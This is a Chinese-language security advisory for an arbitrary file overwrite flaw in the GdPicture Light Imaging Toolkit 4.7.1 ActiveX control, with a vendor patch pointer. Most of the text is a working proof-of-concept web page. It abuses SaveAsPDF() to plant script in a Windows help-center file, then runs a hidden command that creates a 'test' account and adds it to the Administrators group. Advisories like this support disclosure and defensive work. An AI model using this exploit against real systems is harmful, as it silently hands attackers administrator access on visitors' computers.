GdPicture Light Imaging Toolkit ActiveX控件任意文件覆盖漏洞
发布日期:2008-09-30
更新日期:2008-10-06
受影响系统:GdPicture GdPicture Light Imaging Toolkit 4.7.1
描述:
BUGTRAQ ID:
31504
GdPicture Light Imaging Toolkit是用于创建、编辑和打印位图图形的工具包。
GdPicture Light Imaging Toolkit所安装的GdPicture4S.Imaging ActiveX控件(gdpicture4s.ocx)没有安全地调用SaveAsPDF()方式,如果用户受骗访问了恶意网页并向该方式传送了恶意的sTitle参数的话,就可能覆盖系统上的任意文件。
<*来源:EgiX (
n0b0d13s@gmail.com)
链接:
http://secunia.com/advisories/31898/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<object classid='clsid:E8512363-3581-42EF-A43D-990E7935C8BE' id='test'></object>
<script language='javascript'>
var cmd = "cmd /c net user test test /add & net localgroup Administrators test /add";
var outFile = "c:\\windows\\pchealth\\helpctr\\system\\errors\\badurl.htm";
var BMP = "\x42\x4d\x42\x00\x00\x00\x00\x00\x00\x00\x3e" +
"\x00\x00\x00\x28\x00\x00\x00\x01\x00\x00\x00" +
"\x01\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00" +
"\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\xff\xff\xff\x00\x80\x00\x00\x00";
var sc = "<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='wsh'><\/object>" +
"<script language='vbscript'>wsh.Run \"" + cmd + "\", SW_HIDE<\/script>";
test.SetLicenseNumber("0317955669879948884162456"); // only to avoid the nag screen
test.CreateImageFromString(BMP);
if (test.SaveAsPDF(outFile, sc, "", "", "")) location.href = "hcp://system/errors/badurl.htm";
</script>
建议:
厂商补丁:
GdPicture
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.gdpicture.com/softwares.php浏览次数:2605
严重程度:0(网友投票)
